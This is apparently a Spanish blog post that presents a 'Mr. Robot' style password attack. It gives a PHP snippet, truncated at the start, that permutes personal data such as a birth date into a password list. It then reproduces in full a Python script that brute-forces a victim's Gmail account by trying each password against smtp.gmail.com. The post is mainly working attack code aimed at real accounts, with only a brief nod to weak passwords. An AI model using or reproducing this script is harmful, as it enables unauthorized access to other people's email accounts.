viernes, 18 de noviembre de 2016

Hackeando como Mr. Robot: Generador de contraseñas

¡Buenas tardes a todxs! Hoy os vengo a presentar un herramienta en la que estoy trabajando basándome en un vídeo que vi hace poco en el canal de Cesar Gaytán "MrEbola", encargado de el sitio web hackwise.mx. Esta herramienta no es más que una simulación de esa herramienta que veremos en un capítulo de Mr. Robot con la cual generaremos contraseñas con diversas posibilidades para la cuenta a hackear, lo que es conocido como una ataque de fuerza bruta. 


La herramienta no es más que una simple base de datos, con los cuales generaremos contraseñas aleatorias, para ello utilizaremos un simple script con Python. A contunuación el proceso y los códigos utilizados.

Primero utilizaremos una calculadora de permutación para saber todas las convinaciones posibles para los datos que le insertemos a nuestro documento PHP y así generar todas las contaseñas que se puedan dar.  Aquí os dejo una calculadora de permutación

--> CALCULADORA
Lo único de deberemos hacer es poner los datos en cuestión en la calculadora tal y como veréis en la imagen, en este caso usaremos el nombre de la mascota de la persona y la fecha de nacimiento

Ahora simplemente recojeremos los datos generados y los usaremos en nuestro documento php, aquí el código
";
    } else {
        for ($i = count($items) - 1; $i >= 0; --$i) {
             $newitems = $items;
             $newperms = $perms;
             list($foo) = array_splice($newitems, $i, 1);
             array_unshift($newperms, $foo);
             pc_permute($newitems, $newperms);
         }
    }
}

$arr = array('09', '08', '1986');

pc_permute($arr);
?>


Y abriremos el documento con nuestro navegador favorito, es importante destacar que los documentos php no se pueden abrir a no ser que tengas un servidor virtual creado en tu PC.

Ahora pegaremos los valores en nuestro archivo psw.list tal que así:
    09081986
    09198608
    08091986
    08198609
    19860809
    19860908
Ahora cojeremos como ejemplo el scrip de el señor Mr. Ebola para mostrar el funcionalmiento del script
import smtplib

class bcolors:
    OK = '\033[92m'
    FAIL = '\033[91m'
    BOLD = '\033[1m'
    ENDC = '\033[0m'
    UNDERLINE = '\033[4m'

smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
smtpserver.ehlo()
smtpserver.starttls()

print bcolors.BOLD + "Welcome to, mr.ebola Email Cracker based on MR.ROBOT - S01E01 11m03s" + bcolors.ENDC
print bcolors.BOLD + "TRYING WITH PASSWORDS IN: psw.list" + bcolors.ENDC

user = raw_input("Enter the victim's email address: ")
passwfile = "psw.list"
passwfile = open(passwfile, "r")

for password in passwfile:
    try:
        smtpserver.login(user, password)
        print bcolors.UNDERLINE + "Password Found: %s"  % password + bcolors.ENDC
        break;
    except smtplib.SMTPAuthenticationError:
        print bcolors.FAIL + "Password Incorrect: %s" % password + bcolors.ENDC
Y simplemente ingresaremos en el programa y solo nos tocará esperar a que el programa genere posibles convinaciones para la posible password

Aquí están los sítios en los cuales me he basado para hacer la descripción de esta pequeña herramienta y enseñaros lo fácil que sería hackear una cuenta si pones contraseñas fáciles y predecibles.

***************************************FUENTES**********************************

http://www.hackwise.mx/hackeando-cualquier-correo-electronico-como-en-mr-robot-hackwise-ep4/


Sin nada más que añadir me despido.

¡HASTA LA PRÓXIMA!

No hay comentarios:

Publicar un comentario